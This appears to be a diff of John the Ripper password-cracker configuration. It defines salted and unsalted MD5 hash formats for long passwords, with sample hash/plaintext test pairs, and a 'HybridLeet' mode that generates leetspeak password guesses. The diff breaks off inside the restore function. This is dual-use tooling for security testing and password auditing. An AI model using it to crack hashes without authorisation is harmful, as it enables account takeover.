+dynamic_201 = Y
+dynamic_202 = Y
+dynamic_203 = Y
+dynamic_204 = Y
+dynamic_205 = Y
+dynamic_206 = Y
+dynamic_207 = Y
+dynamic_208 = Y
+dynamic_211 = Y
+dynamic_212 = Y
+dynamic_213 = Y
+dynamic_214 = Y
+dynamic_215 = Y
+dynamic_216 = Y
+dynamic_217 = Y
+dynamic_218 = Y
+dynamic_221 = Y
+dynamic_222 = Y
+dynamic_223 = Y
+dynamic_224 = Y
+dynamic_225 = Y
+dynamic_226 = Y
+dynamic_227 = Y
+dynamic_228 = Y
+dynamic_231 = Y
+dynamic_232 = Y
+dynamic_233 = Y
+dynamic_234 = Y
+dynamic_235 = Y
+dynamic_236 = Y
+dynamic_237 = Y
+dynamic_238 = Y
+dynamic_241 = Y
+dynamic_242 = Y
+dynamic_243 = Y
+dynamic_244 = Y
+dynamic_245 = Y
+dynamic_246 = Y
+dynamic_247 = Y
+dynamic_248 = Y
+dynamic_251 = Y
+dynamic_252 = Y
+dynamic_253 = Y
+dynamic_254 = Y
+dynamic_255 = Y
+dynamic_256 = Y
+dynamic_257 = Y
+dynamic_258 = Y
+dynamic_261 = Y
+dynamic_262 = Y
+dynamic_263 = Y
+dynamic_264 = Y
+dynamic_265 = Y
+dynamic_266 = Y
+dynamic_267 = Y
+dynamic_268 = Y
+dynamic_271 = Y
+dynamic_272 = Y
+dynamic_273 = Y
+dynamic_274 = Y
+dynamic_275 = Y
+dynamic_276 = Y
+dynamic_277 = Y
+dynamic_278 = Y
+dynamic_281 = Y
+dynamic_282 = Y
+dynamic_283 = Y
+dynamic_284 = Y
+dynamic_285 = Y
+dynamic_286 = Y
+dynamic_287 = Y
+dynamic_288 = Y
+dynamic_291 = Y
+dynamic_292 = Y
+dynamic_293 = Y
+dynamic_294 = Y
+dynamic_295 = Y
+dynamic_296 = Y
+dynamic_297 = Y
+dynamic_298 = Y
+dynamic_301 = Y
+dynamic_302 = Y
+dynamic_303 = Y
+dynamic_304 = Y
+dynamic_305 = Y
+dynamic_306 = Y
+dynamic_307 = Y
+dynamic_308 = Y
+dynamic_311 = Y
+dynamic_312 = Y
+dynamic_313 = Y
+dynamic_314 = Y
+dynamic_315 = Y
+dynamic_316 = Y
+dynamic_317 = Y
+dynamic_318 = Y
+dynamic_321 = Y
+dynamic_322 = Y
+dynamic_323 = Y
+dynamic_324 = Y
+dynamic_325 = Y
+dynamic_326 = Y
+dynamic_327 = Y
+dynamic_328 = Y
+dynamic_331 = Y
+dynamic_332 = Y
+dynamic_333 = Y
+dynamic_334 = Y
+dynamic_335 = Y
+dynamic_336 = Y
+dynamic_337 = Y
+dynamic_338 = Y
+dynamic_341 = Y
+dynamic_342 = Y
+dynamic_343 = Y
+dynamic_344 = Y
+dynamic_345 = Y
+dynamic_346 = Y
+dynamic_347 = Y
+dynamic_348 = Y
+dynamic_351 = Y
+dynamic_352 = Y
+dynamic_353 = Y
+dynamic_354 = Y
+dynamic_355 = Y
+dynamic_356 = Y
+dynamic_357 = Y
+dynamic_358 = Y
+dynamic_361 = Y
+dynamic_362 = Y
+dynamic_363 = Y
+dynamic_364 = Y
+dynamic_365 = Y
+dynamic_366 = Y
+dynamic_367 = Y
+dynamic_368 = Y
+dynamic_371 = Y
+dynamic_372 = Y
+dynamic_373 = Y
+dynamic_374 = Y
+dynamic_375 = Y
+dynamic_376 = Y
+dynamic_377 = Y
+dynamic_378 = Y
+dynamic_381 = Y
+dynamic_382 = Y
+dynamic_383 = Y
+dynamic_384 = Y
+dynamic_385 = Y
+dynamic_386 = Y
+dynamic_387 = Y
+dynamic_388 = Y
+dynamic_391 = Y
+dynamic_392 = Y
+dynamic_393 = Y
+dynamic_394 = Y
+dynamic_395 = Y
+dynamic_396 = Y
+dynamic_397 = Y
+dynamic_398 = Y
+dynamic_401 = Y
+dynamic_402 = Y
+dynamic_403 = Y
+dynamic_404 = Y
+dynamic_405 = Y
+dynamic_406 = Y
+dynamic_407 = Y
+dynamic_408 = Y
+dynamic_411 = Y
+dynamic_412 = Y
+dynamic_413 = Y
+dynamic_414 = Y
+dynamic_415 = Y
+dynamic_416 = Y
+dynamic_417 = Y
+dynamic_418 = Y
+dynamic_421 = Y
+dynamic_422 = Y
+dynamic_423 = Y
+dynamic_424 = Y
+dynamic_425 = Y
+dynamic_426 = Y
+dynamic_427 = Y
+dynamic_428 = Y
+dynamic_431 = Y
+dynamic_432 = Y
+dynamic_433 = Y
+dynamic_434 = Y
+dynamic_435 = Y
+dynamic_436 = Y
+dynamic_437 = Y
+dynamic_438 = Y
+dynamic_441 = Y
+dynamic_442 = Y
+dynamic_443 = Y
+dynamic_444 = Y
+dynamic_445 = Y
+dynamic_446 = Y
+dynamic_447 = Y
+dynamic_448 = Y
+dynamic_451 = Y
+dynamic_452 = Y
+dynamic_453 = Y
+dynamic_454 = Y
+dynamic_455 = Y
+dynamic_456 = Y
+dynamic_457 = Y
+dynamic_458 = Y
+dynamic_461 = Y
+dynamic_462 = Y
+dynamic_463 = Y
+dynamic_464 = Y
+dynamic_465 = Y
+dynamic_466 = Y
+dynamic_467 = Y
+dynamic_468 = Y
+dynamic_471 = Y
+dynamic_472 = Y
+dynamic_473 = Y
+dynamic_474 = Y
+dynamic_475 = Y
+dynamic_476 = Y
+dynamic_477 = Y
+dynamic_478 = Y
+dynamic_481 = Y
+dynamic_482 = Y
+dynamic_483 = Y
+dynamic_484 = Y
+dynamic_485 = Y
+dynamic_486 = Y
+dynamic_487 = Y
+dynamic_488 = Y
+dynamic_491 = Y
+dynamic_492 = Y
+dynamic_493 = Y
+dynamic_494 = Y
+dynamic_495 = Y
+dynamic_496 = Y
+dynamic_497 = Y
+dynamic_498 = Y
+dynamic_501 = Y
+dynamic_502 = Y
+dynamic_503 = Y
+dynamic_504 = Y
+dynamic_505 = Y
+dynamic_506 = Y
+dynamic_507 = Y
+dynamic_508 = Y
+dynamic_511 = Y
+dynamic_512 = Y
+dynamic_513 = Y
+dynamic_514 = Y
+dynamic_515 = Y
+dynamic_516 = Y
+dynamic_517 = Y
+dynamic_518 = Y
+dynamic_521 = Y
+dynamic_522 = Y
+dynamic_523 = Y
+dynamic_524 = Y
+dynamic_525 = Y
+dynamic_526 = Y
+dynamic_527 = Y
+dynamic_528 = Y
+dynamic_531 = Y
+dynamic_532 = Y
+dynamic_533 = Y
+dynamic_534 = Y
+dynamic_535 = Y
+dynamic_536 = Y
+dynamic_537 = Y
+dynamic_538 = Y
+dynamic_541 = Y
+dynamic_542 = Y
+dynamic_543 = Y
+dynamic_544 = Y
+dynamic_545 = Y
+dynamic_546 = Y
+dynamic_547 = Y
+dynamic_548 = Y
+dynamic_551 = Y
+dynamic_552 = Y
+dynamic_553 = Y
+dynamic_554 = Y
+dynamic_555 = Y
+dynamic_556 = Y
+dynamic_557 = Y
+dynamic_558 = Y
+dynamic_561 = Y
+dynamic_562 = Y
+dynamic_563 = Y
+dynamic_564 = Y
+dynamic_565 = Y
+dynamic_566 = Y
+dynamic_567 = Y
+dynamic_568 = Y
+dynamic_571 = Y
+dynamic_572 = Y
+dynamic_573 = Y
+dynamic_574 = Y
+dynamic_575 = Y
+dynamic_576 = Y
+dynamic_577 = Y
+dynamic_578 = Y
+dynamic_581 = Y
+dynamic_582 = Y
+dynamic_583 = Y
+dynamic_584 = Y
+dynamic_585 = Y
+dynamic_586 = Y
+dynamic_587 = Y
+dynamic_588 = Y
+dynamic_591 = Y
+dynamic_592 = Y
+dynamic_593 = Y
+dynamic_594 = Y
+dynamic_595 = Y
+dynamic_596 = Y
+dynamic_597 = Y
+dynamic_598 = Y
+dynamic_601 = Y
+dynamic_602 = Y
+dynamic_603 = Y
+dynamic_604 = Y
+dynamic_605 = Y
+dynamic_606 = Y
+dynamic_607 = Y
+dynamic_608 = Y
+dynamic_611 = Y
+dynamic_612 = Y
+dynamic_613 = Y
+dynamic_614 = Y
+dynamic_615 = Y
+dynamic_616 = Y
+dynamic_617 = Y
+dynamic_618 = Y
+dynamic_621 = Y
+dynamic_622 = Y
+dynamic_623 = Y
+dynamic_624 = Y
+dynamic_625 = Y
+dynamic_626 = Y
+dynamic_627 = Y
+dynamic_628 = Y
+dynamic_631 = Y
+dynamic_632 = Y
+dynamic_633 = Y
+dynamic_634 = Y
+dynamic_635 = Y
+dynamic_636 = Y
+dynamic_637 = Y
+dynamic_638 = Y
+dynamic_641 = Y
+dynamic_642 = Y
+dynamic_643 = Y
+dynamic_644 = Y
+dynamic_645 = Y
+dynamic_646 = Y
+dynamic_647 = Y
+dynamic_648 = Y
+dynamic_651 = Y
+dynamic_652 = Y
+dynamic_653 = Y
+dynamic_654 = Y
+dynamic_655 = Y
+dynamic_656 = Y
+dynamic_657 = Y
+dynamic_658 = Y
+dynamic_661 = Y
+dynamic_662 = Y
+dynamic_663 = Y
+dynamic_664 = Y
+dynamic_665 = Y
+dynamic_666 = Y
+dynamic_667 = Y
+dynamic_668 = Y
+dynamic_671 = Y
+dynamic_672 = Y
+dynamic_673 = Y
+dynamic_674 = Y
+dynamic_675 = Y
+dynamic_676 = Y
+dynamic_677 = Y
+dynamic_678 = Y
+dynamic_681 = Y
+dynamic_682 = Y
+dynamic_683 = Y
+dynamic_684 = Y
+dynamic_685 = Y
+dynamic_686 = Y
+dynamic_687 = Y
+dynamic_688 = Y
+dynamic_691 = Y
+dynamic_692 = Y
+dynamic_693 = Y
+dynamic_694 = Y
+dynamic_695 = Y
+dynamic_696 = Y
+dynamic_697 = Y
+dynamic_698 = Y
+
+dynamic_1033 = Y
@@ -0,0 +1,212 @@
+# NOTE, same format as dynamic_0  It is slower (50% slower, or more).  But it is not limited to 55 byte passwords.
+# This should work for passwords up to 110 bytes long (max length dynamic will currently allow). It should not be
+# used for shorter passwords (under 55 bytes).  Use dyna_0 for those.
+[List.Generic:dynamic_2000]
+Expression=md5($p) (PW > 55 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SOURCE
+Flag=MGF_POOR_OMP
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2000$5a105e8b9d40e1329780d62ea2265d8a:test1
+Test=$dynamic_2000$378e2c4a07968da2eca692320136433d:thatsworking
+Test=$dynamic_2000$8ad8757baa8564dc136c1e07507f4a98:test3
+TestD=$dynamic_2000$a4b3933521a38111eb597dd8dbc47614:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2001]
+Expression=md5($p.$s) (joomla) (PW > 23 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2001$ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
+Test=$dynamic_2001$4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
+Test=$dynamic_2001$82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
+TestD=$dynamic_2001$a4d4ce08d9dec5336d2a137cdab28624$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2002]
+Expression=md5(md5($p)) (e107) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2002$418d89a45edadb8ce4da17e07f72536c:test1
+Test=$dynamic_2002$ccd3c4231a072b5e13856a2059d04fad:thatsworking
+Test=$dynamic_2002$9992295627e7e7162bdf77f14734acf8:test3
+TestD=$dynamic_2002$827b31e7fae2cdb3af70be9560162500:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2003]
+Expression=md5(md5(md5($p))) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2003$964c02612b2a1013ed26d46ba9a73e74:test1
+Test=$dynamic_2003$5d7e6330f69548797c07d97c915690fe:thatsworking
+Test=$dynamic_2003$2e54db8c72b312007f3f228d9d4dd34d:test3
+TestD=$dynamic_2003$35297f9d34baa8e3ca3e5b23155be26f:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2004]
+Expression=md5($s.$p) (OSC) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2004$c02e8eef3eaa1a813c2ff87c1780f9ed$123456:test1
+Test=$dynamic_2004$4a2a1b013da3cda7f7e0625cf3dc3f4c$1234:thatsworking
+Test=$dynamic_2004$3a032e36a9609df6411b8004070431d3$aaaaa:test3
+TestD=$dynamic_2004$d75040e824c1f9e4efd67c19961ddf4d$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2005]
+Expression=md5($s.$p.$s) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2005$c1003cd39cb5523dd0923a94ab15a3c7$123456:test1
+Test=$dynamic_2005$c1c8618abfc7bdbc4a3c49c2c2c48f82$1234:thatsworking
+Test=$dynamic_2005$e7222e806a8ce5efa6d48acb3aa56dc2$aaaaa:test3
+TestD=$dynamic_2005$ba5528ac65c20213e105bb02e6aaf6a2$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2006]
+Expression=md5(md5($p).$s) (PW > 55 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2006$3a9ae23758f05da1fe539e55a096b03b$S111XB:test1
+Test=$dynamic_2006$9694d706d1992abf04344c1e7da1c5d3$T &222:thatsworking
+Test=$dynamic_2006$b7a7f0c374d73fac422bb01f07f5a9d4$lxxxl:test3
+Test=$dynamic_2006$9164fe53be481f811f15efd769aaf0f7$aReallyLongSaltHere:test3
+TestD=$dynamic_2006$7308f7ca156d77564a5dab25d4be0f34$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2008]
+Expression=md5(md5($s).$p) (PW > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2008$534c2fb38e757d9448315abb9822db00$aaaSXB:test1
+Test=$dynamic_2008$02547864bed278658e8f54dd6dfd69b7$123456:thatsworking
+Test=$dynamic_2008$2f6f3881972653ebcf86e5ad3071a4ca$5555hh:test3
+TestD=$dynamic_2008$a96d6ab818950bafc6baeaa80df5ec5c$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2009]
+Expression=md5($s.md5($p)) (salt > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-200
+MaxInputLenX86=40
+MaxInputLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2009$b38c18b5e5b676e211442bd41000b2ec$aaaSXB:test1
+Test=$dynamic_2009$4dde7cd4cbf0dc4c59b255ae77352914$123456:thatsworking
+Test=$dynamic_2009$899af20e3ebdd77aaecb0d9bc5fbbb66$5555hh:test3
+
+[List.Generic:dynamic_2010]
+Expression=md5($s.md5($s.$p)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2010$781f83a676f45169dcfc7f36dfcdc3d5$aaaSXB:test1
+Test=$dynamic_2010$f385748e67a2dc1f6379b9124fabc0df$123456:thatsworking
+Test=$dynamic_2010$9e3702bb13386270cd4b0bd4dbdd489e$5555hh:test3
+TestD=$dynamic_2010$74fe90a89e9e6ee5ea28d4a92640eda5$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2011]
+Expression=md5($s.md5($p.$s)) (PW > 32 or salt > 23 bytes)
+Flag=MGF_SALTED
+#Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2011$f809a64cbd0d23e099cd5b544c8501ac$aaaSXB:test1
+Test=$dynamic_2011$979e6671535cda6db95357d8a0afd9ac$123456:thatsworking
+Test=$dynamic_2011$78a61ea73806ebf27bef2ab6a9bf5412$5555hh:test3
+TestD=$dynamic_2011$d5acc2492e19cbf252d54942b4c7620b$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2012]
+#dynamic_12 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2012
+
+#[List.Generic:dynamic_2013]
+#dynamic_13 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2013
+
+[List.Generic:dynamic_2014]
+Expression=md5($s.md5($p).$s) (PW > 55 or salt > 11 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2014$778e40e10d82a08f5377992330008cbe$aaaSXB:test1
+Test=$dynamic_2014$d6321956964b2d27768df71d139eabd2$123456:thatsworking
+Test=$dynamic_2014$1b3c72e16427a2f4f0819243877f7967$5555hh:test3
+TestD=$dynamic_2014$6f20299d2e889eea146d141e92e91da1$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+#[List.Generic:dynamic_2015]
+#dynamic_15 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2015
+
+#[List.Generic:dynamic_2016]
+#dynamic_16 already in MGF_FLAT_BUFFERS, so no reason for dynamic_2016
@@ -0,0 +1,344 @@
+[List.HybridLeet:new]
+    int i, j;
+	int c, p;
+	int totrots;
+	int length;
+
+	/* Get the word length */
+	length = 0; while (word[length++]) ; --length;
+
+	/* Skip if this word length is out of bounds
+	   This should not be necessary, but we'll leave it here to be defensive */
+	if (req_minlen > length || (req_maxlen && req_maxlen < length ))
+	{
+		hybrid_total = 0;
+		return;
+	}
+
+	/* Calculate word rotations */
+
+	word_rot_count=0; 	/* Number of letter positions we are rotating for this word */
+	totrots = 1; 		/* Number of total rotation iterations */
+
+	i=0;
+	while (i < length)
+	{
+		/* is this letter one of our rotators? a,A, b,B etc*/
+		c = word[i];
+		j = 0;
+		while (j < rot_poslen)
+		{
+			p = rot_pos[j];
+			if (c == rot_chars[p] || c == rot_chars[p+1]) 	/* Is 'a' or 'A' for example */
+			{
+				word_rot_idx[word_rot_count] = i;		/* Save off which letter position in the word we are rotating */
+				word_rot_pos[word_rot_count] = j;		/* Save off the rotation position for this slot */
+				word_rotchars_pos[word_rot_count] = p; 	/* Save off the first letter position in the rotation */
+				word_rot_count++;
+
+				/* Also, set the word to the first letter in the rotation so we ensure to go through all of them */
+				word[i] = rot_chars[p];
+
+				/* And multiple number of total rotations by the number of rotations for this position */
+				totrots = totrots * rot_len[j];
+
+				break;
+			}
+			j++;
+		}
+		i++;
+	}
+
+	hybrid_total = totrots;
+
+	/* Reset or counter for THIS word. */
+	word_rot_current = 0;
+
+[List.External:HybridLeet]
+
+/*
+    Static context
+    String lengths here are arbitrary, increase them if you increase the
+    size of the stuff in the init() procedure
+*/
+
+int rot_chars[256];		/* All characters to rotate */
+int rot_charslen;    	/* The length of the rot_chars buffer */
+
+int rot_len[26];    	/* The number of characters to rotate through per letter */
+int rot_pos[26];    	/* The starting position of each letter group in the rot_chars string */
+int rot_poslen;			/* Length of rot_pos and rot_len arrays (both same size) */
+
+int word_rot_idx[128];  		/* The positions in the current word that require rotations (index into word)*/
+int word_rot_pos[128];  		/* The rot_pos index for each letter position in the current word that we are rotating (index into rot_pos)*/
+int word_rotchars_pos[128];  	/* The current rot_chars index for each letter position in the current word that we are rotating (state of rotation, index into rot_chars)*/
+int word_rot_count;     		/* The number of letters that we are rotating in the current word (size of word_rot_idx, word_rot_pos, and word_rotchars_pos) */
+
+int word_rot_current;	/* The rotation number of the current word */
+
+void init()
+{
+	int rci;
+	int ri;
+
+	rot_charslen=0;
+	rci=0;
+	ri=0;
+
+	/* a */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'a'; /* The first two chars are always the lower */
+	rot_chars[rci++] = 'A'; /* and upper case letters to rotate on */
+	rot_chars[rci++] = '4';
+	rot_chars[rci++] = '@';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* b */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'b';
+	rot_chars[rci++] = 'B';
+	rot_chars[rci++] = '8';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'c';
+	rot_chars[rci++] = 'C';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'd';
+	rot_chars[rci++] = 'D';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* e */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'e';
+	rot_chars[rci++] = 'E';
+	rot_chars[rci++] = '3';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'f';
+	rot_chars[rci++] = 'F';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'g';
+	rot_chars[rci++] = 'G';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* h */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'h';
+	rot_chars[rci++] = 'H';
+	rot_chars[rci++] = '#';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* i */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'i';
+	rot_chars[rci++] = 'I';
+	rot_chars[rci++] = '1';
+	rot_chars[rci++] = '!';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'j';
+	rot_chars[rci++] = 'J';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'k';
+	rot_chars[rci++] = 'K';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* l */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'l';
+	rot_chars[rci++] = 'L';
+	rot_chars[rci++] = '1';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'm';
+	rot_chars[rci++] = 'M';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'n';
+	rot_chars[rci++] = 'N';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* o */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'o';
+	rot_chars[rci++] = 'O';
+	rot_chars[rci++] = '0';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'p';
+	rot_chars[rci++] = 'P';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'q';
+	rot_chars[rci++] = 'Q';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'r';
+	rot_chars[rci++] = 'R';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* s */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 's';
+	rot_chars[rci++] = 'S';
+	rot_chars[rci++] = '$';
+	rot_chars[rci++] = '5';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	/* t */
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 't';
+	rot_chars[rci++] = 'T';
+	rot_chars[rci++] = '+';
+	rot_chars[rci++] = '7';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'u';
+	rot_chars[rci++] = 'U';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'v';
+	rot_chars[rci++] = 'V';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'w';
+	rot_chars[rci++] = 'W';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'x';
+	rot_chars[rci++] = 'X';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'y';
+	rot_chars[rci++] = 'Y';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_pos[ri] = rci;
+	rot_chars[rci++] = 'z';
+	rot_chars[rci++] = 'Z';
+	rot_len[ri] = (rci - rot_pos[ri]);
+	ri++;
+
+	rot_charslen = rci;
+	rot_poslen = ri;
+
+}
+
+/* new word */
+void new()
+{
+.include [List.HybridLeet:new]
+}
+
+void next()
+{
+	int i, j;
+
+	/* If we have reached the maximum number of rotations, we're done */
+	if (word_rot_current == hybrid_total)
+	{
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	i=0;
+	while (i < word_rot_count)
+	{
+		/* Replace letter in word with appropriate rotated letter fom rot_chars */
+		word[word_rot_idx[i]] = rot_chars[word_rotchars_pos[i]];
+		i++;
+	}
+
+	/* Rotate the word_rotchars_pos */
+	i=0;
+	while (i < word_rot_count)
+	{
+		word_rotchars_pos[i]++;
+
+		j = word_rot_pos[i];
+		if (word_rotchars_pos[i] != (rot_pos[j] + rot_len[j]))
+		{
+			/* No carry */
+			break;
+		}
+
+		/* Rotation overflow, carry to next rotation */
+		word_rotchars_pos[i] = rot_pos[j];
+
+		i++;
+	}
+
+	word_rot_current++;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int wrc;
+
+.include [List.HybridLeet:new]
+
+	/* Pick up the current iteration */
+	word_rot_current = hybrid_resume;
+
